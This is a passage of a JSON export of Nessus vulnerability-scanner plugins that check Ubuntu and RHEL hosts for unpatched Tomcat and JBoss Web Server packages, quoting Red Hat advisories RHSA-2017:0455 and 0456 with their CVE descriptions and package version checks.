0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libtomcat6-java\", pkgver:\"6.0.35-1ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"tomcat6\", pkgver:\"6.0.35-1ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libtomcat7-java\", pkgver:\"7.0.52-1ubuntu0.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"tomcat7\", pkgver:\"7.0.52-1ubuntu0.7\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libtomcat8-java\", pkgver:\"8.0.32-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"tomcat8\", pkgver:\"8.0.32-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtomcat6-java / libtomcat7-java / libtomcat8-java / tomcat6 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:21:22", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Web Server 3 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2017-0456.NASL", "href": "https://www.tenable.com/plugins/nessus/97596", "published": "2017-03-08T00:00:00", "title": "RHEL 7 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0456)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0456. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97596);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-0762\", \"CVE-2016-1240\", \"CVE-2016-3092\", \"CVE-2016-5018\", \"CVE-2016-6325\", \"CVE-2016-6794\", \"CVE-2016-6796\", \"CVE-2016-6797\", \"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-8745\");\n script_xref(name:\"RHSA\", value:\"2017:0456\");\n\n script_name(english:\"RHEL 7 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0456)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 3 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only\nincluded in EWS 2.x and JWS 3.x source distributions. If you deploy a\nTomcat instance built from source, using the EWS 2.x, or JWS 3.x\ndistributions, an attacker could use this flaw to launch a remote code\nexecution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons\nFileUpload that occurred when the length of the multipart boundary was\njust below the size of the buffer (4096 bytes) used to read the\nuploaded file if the boundary was the typical tens of bytes long.\n(CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if\nthe supplied user name did not exist. This made a timing attack\npossible to determine valid user names. Note that the default\nconfiguration includes the LockOutRealm which makes exploitation of\nthis vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via a Tomcat utility method that was\naccessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's\nsystem property replacement feature for configuration files could be\nused by a malicious web application to bypass the SecurityManager and\nread system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via manipulation of the configuration\nparameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to\naccess any global JNDI resource whether an explicit ResourceLink had\nbeen configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s) :\n\n* This enhancement update adds the Red Hat JBoss Web Server 3.1.0\npackages to Red Hat Enterprise Linux 7. These packages provide a\nnumber of enhancements over the previous version of Red Hat JBoss Web\nServer. (JIRA#JWS-268)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8745\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-c3p0-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0456\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-c3p0-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-core-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-entitymanager-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-envers-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbcs-httpd24-apache-commons-daemon-1.0.15-1.redhat_2.1.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbcs-httpd24-runtime-1-3.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"mod_cluster-1.3.5-2.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"mod_cluster-tomcat7-1.3.5-2.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"mod_cluster-tomcat8-1.3.5-2.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.8-9.redhat_9.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-vault-1.0.8-9.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsvc-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-selinux-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-admin-webapps-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-docs-webapp-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-el-2.2-api-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-javadoc-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsp-2.3-api-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsvc-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-lib-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-log4j-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-selinux-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-servlet-3.1-api-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-webapps-8.0.36-17.ep7.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-c3p0-eap6 / hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:21:22", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Web Server 3 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2017-0455.NASL", "href": "https://www.tenable.com/plugins/nessus/97595", "published": "2017-03-08T00:00:00", "title": "RHEL 6 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0455)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0455. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97595);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-0762\", \"CVE-2016-1240\", \"CVE-2016-3092\", \"CVE-2016-5018\", \"CVE-2016-6325\", \"CVE-2016-6794\", \"CVE-2016-6796\", \"CVE-2016-6797\", \"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-8745\");\n script_xref(name:\"RHSA\", value:\"2017:0455\");\n\n script_name(english:\"RHEL 6 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0455)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 3 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only\nincluded in EWS 2.x and JWS 3.x source distributions. If you deploy a\nTomcat instance built from source, using the EWS 2.x, or JWS 3.x\ndistributions, an attacker could use this flaw to launch a remote code\nexecution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons\nFileUpload that occurred when the length of the multipart boundary was\njust below the size of the buffer (4096 bytes) used to read the\nuploaded file if the boundary was the typical tens of bytes long.\n(CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if\nthe supplied user name did not exist. This made a timing attack\npossible to determine valid user names. Note that the default\nconfiguration includes the LockOutRealm which makes exploitation of\nthis vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via a Tomcat utility method that was\naccessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's\nsystem property replacement feature for configuration files could be\nused by a malicious web application to bypass the SecurityManager and\nread system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via manipulation of the configuration\nparameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to\naccess any global JNDI resource whether an explicit ResourceLink had\nbeen configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s) :\n\nThis enhancement update adds the Red Hat JBoss Web Server 3.1.0\npackages to Red Hat Enterprise Linux 6. These packages provide a\nnumber of enhancements over the previous version of Red Hat JBoss Web\nServer. (JIRA#JWS-267)\n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these\nupdated packages, which add this enhancement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8745\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-c3p0-eap6\");\n script_set_attribute(attribute:\"cpe\", 